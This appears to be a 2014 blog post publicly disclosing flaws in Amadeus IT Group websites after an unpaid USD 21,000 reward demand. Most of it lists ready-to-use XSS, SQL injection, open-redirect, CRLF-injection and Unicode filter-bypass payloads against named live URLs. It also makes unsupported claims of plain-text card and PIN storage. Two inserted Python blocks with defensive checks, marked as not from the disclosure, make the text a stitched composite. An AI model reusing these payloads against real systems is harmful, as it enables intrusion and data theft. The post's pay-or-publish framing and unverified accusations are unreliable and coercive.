Tuesday, January 21, 2014

Amadeus IT Group - Public Disclosure

Download PoC & Conversation screenshots:-
Password for PDF: whiteHatMrNervous
Summary:
Date First Contacted: December 27, 2013
Reward demanded: USD 21,000
Any Reward Paid: No
Communication Channel: Company rep only conversed via blog comments and Gmail and Hotmail IDs (screenshots attached). They never used their official email, but the IP of the blog comment was traced to Amadeus SAAS, FR
Vulnerability List: SQL Injection, Cross site scripting, HTTP Parameter Pollution, CRLF Injection, Open Redirect, Unicode transformation issues
Infected object: Main website & sub-domains
Retest Infection: Definitely will
Leaked database dump/files: None
Received Respect: No
Received Appreciation for Intimation about Existence of Security Vulnerabilities: No
Hall of Fame: No
Amadeus IT Group (your technology partner) – Transaction processor for the global travel and tourism industry.
Amadeus IT Group is the most used GDS (Global Distribution System; France based, Germany influenced) among Travel & Tour companies. Amadeus IT Group stores confidential client data in plain text on their servers. This data is stored and used by the Travel & Tour companies that operate the Amadeus GDS. Amadeus GDS has a feature called client profile, wherein each employee of a company can create/access/modify data about the company's clients. This data includes full name, date of birth, address, passport & visa details, and credit card numbers with PIN and expiry details. Their web service and GDS application are also vulnerable to stack overflow, remote code execution, etc. And their website is vulnerable to whatever is mentioned below. Amadeus IT Group is untouched territory, known largely only by and within the Travel & Tour industry. Hence, hat hackers have never audited the security of Amadeus IT Group and its various products.
A] Cross Site Scripting (Amadeus XSS)
1. URL: amadeus.com/cgi-bin/appl/list.pl [GET]
Infected Parameters: 3 (whiteHatMrNervous reflected in returned source code)
?cat_nr=C97F6457-8274-43D5-8942-2C17F30D8DBA" onmouseover=prompt(whiteHatMrNervous) bad="
?job_nr=8F3C4897-6F62-40BE-83C2-A802C5AA201E--><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!--
?loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE--><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!--
2. URL: amadeus.com/linkhotel/nominate-hotel.html [POST (multipart) input]
Infected Parameters: 9 (whiteHatMrNervous reflected in returned source code)
?city=San Francisco" onmouseover=prompt(whiteHatMrNervous) bad="
?clients_corporations=1" onmouseover=prompt(whiteHatMrNervous) bad="
?company=MatchMeCupidCheatsFreelancers" onmouseover=prompt(whiteHatMrNervous) bad="
?email=SalesForce@hasXSS.com" onmouseover=prompt(whiteHatMrNervous) bad="
?first_name=AmadeusXSS" onmouseover=prompt(whiteHatMrNervous) bad="
?last_name=HackersParadise" onmouseover=prompt(whiteHatMrNervous) bad="
?rate_access_code=94102" onmouseover=prompt(whiteHatMrNervous) bad="
?telephone=555-666-0606" onmouseover=prompt(whiteHatMrNervous) bad="
?top_locations=1" onmouseover=prompt(whiteHatMrNervous) bad="
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp [GET]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?srchfor=0_978176%26quot;():;whiteHatMrNervous
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp [GET]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?lastname=del"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?postalcode=94102"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?province=NY"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?username=whiteHatMrNervous"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp [GET]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?start=1'sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad='>
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp [GET]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?btn=dosrch"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?keywords=1"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
?srchfor=0'sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad='>
?wrd=1"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp [GET]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?nodetree=choosesite"sTYLe='acu:Expre/**/SSion(prompt(whiteHatMrNervous))'bad=">
B] SQL Injection
1. URL: amadeus.com/cgi-bin/appl/list.pl
Infected Parameters: 3
?cat_nr=1'"
?job_nr=1'"
?loc_nr=1'"
2. URL: myamadeus.net/homepage.aspx
Infected Parameters: 2
?ctl00%24txtPwd='+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+'
?ctl00%24txtUserid='+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+'
C] Open Redirect
1. URL: amadeus.com/corpweb/amaweb1camp.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
2. URL: amadeus.com/corpweb/eformstawfv2.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
3. URL: amadeus.com/corpweb/eformstowf.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
4. URL: amadeus.com/corpweb/hotelcampaignsen.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
5. URL: amadeus.com/corpweb/newsletters_cars_forms.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
6. URL: amadeus.com/corpweb/online_traveller_study_event.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
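Each of the six `.nsf/request` forms above forwards the browser to whatever absolute URL is placed in `redirect`. The following is an added example (not from this disclosure and not Amadeus code) of the server-side allowlist check a defender would put in front of such a parameter; the allowed host set and the fallback landing path are assumed values.

```python
from urllib.parse import urlsplit

# Assumed allowlist of hosts a redirect may point at (not from the page).
ALLOWED_HOSTS = {"amadeus.com", "www.amadeus.com"}
DEFAULT_TARGET = "/corpweb/"  # assumed fallback landing page


def safe_redirect_target(redirect, default=DEFAULT_TARGET):
    """Return `redirect` only if it stays on-site; otherwise the default.

    Covers the usual bypasses of a naive check: protocol-relative '//host',
    backslash variants, userinfo tricks ('http://good.example@evil.example'),
    non-HTTP schemes, and CR/LF that would split the Location header.
    """
    if not redirect or any(c in redirect for c in "\r\n\\"):
        return default
    parts = urlsplit(redirect)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: must be rooted ('/path') but not '//host'.
        if redirect.startswith("/") and not redirect.startswith("//"):
            return redirect
        return default
    if parts.scheme.lower() not in ("http", "https"):
        return default
    # `hostname` strips userinfo and port, so 'a@b' resolves to host 'b'.
    host = (parts.hostname or "").lower()
    return redirect if host in ALLOWED_HOSTS else default
```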
E] CRLF Injection
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?siteid=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp
Infected Parameter: 1
?start=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp
Infected Parameter: 1
?nodetree=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
F] Unicode transformation issues
1. URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?address1=whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929
2. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=pcjndrci&address1=acux9929>z1<z2a%EF%BF%BDbcxuca9929&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?city=whiteHatMrNervous1690%C0%BEz1%C0%BCz2a%90bcxyyy1690
3. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=tbewfsld&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=acux1690>z1<z2a%EF%BF%BDbcxuca1690&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?country=whiteHatMrNervous8949%C0%BEz1%C0%BCz2a%90bcxyyy8949
4. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ldsbvqpp&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=acux8949>z1<z2a%EF%BF%BDbcxuca8949&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?familiarname=whiteHatMrNervous3871%C0%BEz1%C0%BCz2a%90bcxyyy3871
5. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=acux3871>z1<z2a%EF%BF%BDbcxuca3871&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?firstname=whiteHatMrNervous9454%C0%BEz1%C0%BCz2a%90bcxyyy9454
6. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=acux9454>z1<z2a%EF%BF%BDbcxuca9454&lastname=del&familiarname=ibxwwpis&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?Language=whiteHatMrNervous3664%C0%BEz1%C0%BCz2a%90bcxyyy3664
7. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ndomggee&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=acux3664>z1<z2a%EF%BF%BDbcxuca3664&Activity=-1&site=Europe&nodetree=choosesite
?lastname=whiteHatMrNervous1260%C0%BEz1%C0%BCz2a%90bcxyyy1260
8. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=acux1260>z1<z2a%EF%BF%BDbcxuca1260&familiarname=ghdjqguv&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?postalcode=whiteHatMrNervous3683%C0%BEz1%C0%BCz2a%90bcxyyy3683
9. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=sngjchwn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=acux3683>z1<z2a%EF%BF%BDbcxuca3683&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?province=whiteHatMrNervous9518%C0%BEz1%C0%BCz2a%90bcxyyy9518
10. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=jokctcch&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=acux9518>z1<z2a%EF%BF%BDbcxuca9518&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?site=whiteHatMrNervous9340%C0%BEz1%C0%BCz2a%90bcxyyy9340
11. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=iiaukhmo&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=acux9340>z1<z2a%EF%BF%BDbcxuca9340&nodetree=choosesite
?username=whiteHatMrNervous3710%C0%BEz1%C0%BCz2a%90bcxyyy3710
12. URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous3710>z1<z2a%EF%BF%BDbcxyyy3710&firstname=del&lastname=del&familiarname=lfbykbbn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
13. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp?start=whiteHatMrNervous9935%C0%BEz1%C0%BCz2a%90bcxyyy9935
14. URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket.jsp?start=whiteHatMrNervous9935%3Ez1%3Cz2a%FDbcxyyy9935
15. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp?btn=whiteHatMrNervous2700%C0%BEz1%C0%BCz2a%90bcxyyy2700
16. URL: alc.amadeus.com/ilearn/en/learner/jsp/search_all.jsp?aor=0&btn=acux2700%C0%BEz1%C0%BCz2a%90bcxuca2700&cert=A&col=0&CompetencyId=&datechoice=S&daterng=1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?keywords=whiteHatMrNervous7201%C0%BEz1%C0%BCz2a%90bcxyyy7201
17. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=acux7201%C0%BEz1%C0%BCz2a%90bcxuca7201&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?srchfor=whiteHatMrNervous5083%C0%BEz1%C0%BCz2a%90bcxyyy5083
18. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=advsrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=acux5083%C0%BEz1%C0%BCz2a%90bcxuca5083&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?wrd=whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
19. URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
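Why the `%C0%BE` / `%C0%BC` probes come back as `>z1<z2a%EF%BF%BD` in the reflected URLs above: `C0 BE` and `C0 BC` are overlong two-byte UTF-8 encodings of `>` (0x3E) and `<` (0x3C). A compliant decoder rejects them, but a decoder that merely masks and shifts the bits turns them into angle brackets, so a `<`/`>` filter that runs before decoding is bypassed; the stray continuation byte `%90` has no lead byte and becomes U+FFFD (`%EF%BF%BD` when re-encoded). The following is an added example (not from this disclosure) that contrasts the two decoders on the page's own probe string and shows the strict parameter check a defender would apply instead.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample: the section-F probe value from this page, percent-encoded.
SAMPLE_PARAM = "whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929"


def lenient_decode(raw):
    """Bit-masking two-byte decoder that accepts overlong forms (the bug class)."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(raw) and 0x80 <= raw[i + 1] < 0xC0:
            # Never checks that the code point needed two bytes: C0 BE -> 0x3E ('>').
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")  # orphan continuation byte such as 0x90
            i += 1
    return "".join(out)


def strict_decode(raw):
    """Decode as UTF-8, or return None: overlong and orphan bytes are rejected."""
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def decode_both(param):
    """(lenient, strict) results for one percent-encoded query value."""
    raw = unquote_to_bytes(param)
    return lenient_decode(raw), strict_decode(raw)


def check_param(param):
    """Defender's path: reject invalid UTF-8 and markup/header metacharacters."""
    text = strict_decode(unquote_to_bytes(param))
    if text is None or any(c in text for c in "<>\r\n"):
        return None
    return text
```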